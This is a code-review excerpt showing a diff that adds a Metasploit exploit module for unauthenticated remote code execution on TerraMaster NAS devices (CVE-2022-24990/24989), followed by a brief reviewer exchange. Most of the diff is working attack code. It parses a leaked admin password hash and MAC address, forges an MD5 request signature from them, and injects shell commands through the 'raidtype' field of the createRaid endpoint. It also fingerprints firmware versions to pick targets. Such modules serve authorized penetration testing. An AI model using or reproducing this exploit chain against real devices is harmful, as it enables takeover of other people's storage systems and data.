modules/exploits/linux/http/terramaster_unauth_rce_cve_2022_24990.rb

```diff
@@ -0,0 +1,198 @@
+      # Parse the JSON response and get the data such as admin password hash and MAC address
+      res_json = res.get_json_document
+      unless res_json.blank?
+        @data['password'] = res_json['data'].split('PWD:')[1].split('SAT')[0].strip
+        @data['mac'] = res_json['data'].split('mac":"')[1].split('"')[0].tr(':', '').strip
+        @data['key'] = @data['mac'][6..11] # last three MAC address entries
+        @data['timestamp'] = Time.new.to_i.to_s
+        # derive signature
+        @data['signature'] = tos_encrypt_str(@data['key'], @data['timestamp'])
+      end
+    end
+  end
+
+  def tos_encrypt_str(key, str_to_encrypt)
+    id = key + str_to_encrypt
+    return Digest::MD5.hexdigest(id.encode('utf-8'))
+  end
+
+  def execute_command(cmd, _opts = {})
+    # Execute RCE using vulnerable endpoint `api.php?mobile/createRaid`
+    # CVE-2022-24989
+    diskstring = Rex::Text.rand_text_alpha_upper(4..8)
+
+    send_request_cgi({
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, 'module', 'api.php?mobile/createRaid'),
+      'ctype' => 'application/x-www-form-urlencoded',
+      'headers' => {
+        'User-Agent' => 'TNAS',
+        'Authorization' => @data['password'],
+        'Signature' => @data['signature'],
+        'Timestamp' => @data['timestamp']
+      },
+      'vars_post' => {
+        'raidtype' => ';' + cmd,
+        'diskstring' => diskstring.to_s
+      }
+    })
+  end
+
+  def get_terramaster_info
+    # get Terramaster CPU architecture (X64 or ARM64) and TOS version
+    @terramaster = {}
+    res = send_request_cgi({
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, 'tos', 'index.php?user/login')
+    })
+
+    if res && res.body && res.code == 200
+      # get the version information from the request response like below:
+      # <link href="./static/style/bootstrap.css?ver=TOS3_A1.0_4.2.07" rel="stylesheet"/>
+      return if res.body.match(/ver=.+?"/).nil?
+
+      version = res.body.match(/ver=.+?"/)[0]
+      # check if architecture is ARM64 or X64
+      if version.match(/_A/)
+        @terramaster['cpu_arch'] = 'ARM64'
+      elsif version.match(/_S/) || version.match(/_Q/)
+        @terramaster['cpu_arch'] = 'X64'
+      else
+        @terramaster['cpu_arch'] = 'UNKNOWN'
+      end
+
+      # strip TOS version number and remove trailing double quote.
+      @terramaster['tos_version'] = version.split('.0_')[1].chop
+    end
+  end
+
+  def check
+    get_terramaster_info
+    return CheckCode::Safe if @terramaster.empty?
+
+    if Rex::Version.new(@terramaster['tos_version']) <= Rex::Version.new('4.2.29')
+      return CheckCode::Vulnerable("TOS version is #{@terramaster['tos_version']} and CPU architecture is #{@terramaster['cpu_arch']}.")
+    end
+
+    CheckCode::Safe("TOS version is #{@terramaster['tos_version']} and CPU architecture is #{@terramaster['cpu_arch']}.")
+  end
+
+  def exploit
+    # get the leaked data
```

Comment:
No need for this comment, `get_data` is self-explanatory I think.

Reply:
See https://github.com/rapid7/metasploit-framework/pull/18086/commits/4479d9465803ed25fd15f21af7c92b05e753baf3